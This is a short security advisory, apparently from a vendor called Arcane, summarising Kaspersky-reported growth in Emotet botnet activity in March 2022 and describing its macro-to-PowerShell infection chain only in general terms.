Emotet Botnet Activity multiplied by 3x in Just One Month

Emotet activity exhibited a gain of over 200% just in March 2022, according to Kaspersky. This shift indicates that the adversary behind the botnet has immensely increased its malicious activity since Q4 in 2021.

Emotet is both botnet and malware that is qualified for exfil sensitive data, mostly targeted to the finance sector. Emotet was shut down by law enforcement agencies including Europol, FBI operations in January 2021. Mid of November 2021, the botnet returned with Trickbot to spread malicious ransomware campaigns.

Emotet telemetry shows us victims raised from 2,843 in February 2022 to 9,086 in March, attacks detected by tools have increased – from 16K in February 2022 to 49K in March [1]

A distinctive Emotet infection starts with ransomware emails that contain office attachments with a malicious macro, if it is enabled and executed by the user, the adversary can initiate malicious commands via PowerShell that executes a module loader, then communicate with C&C to download malicious payloads. According to research, the PoC test environment was able to get 10 out of 16 modules, most of them being used by Emotet in the past.

References

1- https://www.kaspersky.com/blog/trickbot-new-tricks/42622/

Disclaimer

The information provided in the Arcane Security Advisory is provided "as is" without warranty of any kind. Arcane disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Arcane or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits, or special damages, even if Arcane or its suppliers have been advised of the possibility of such damages.

Tags: #emotet #ransomware #security-advisory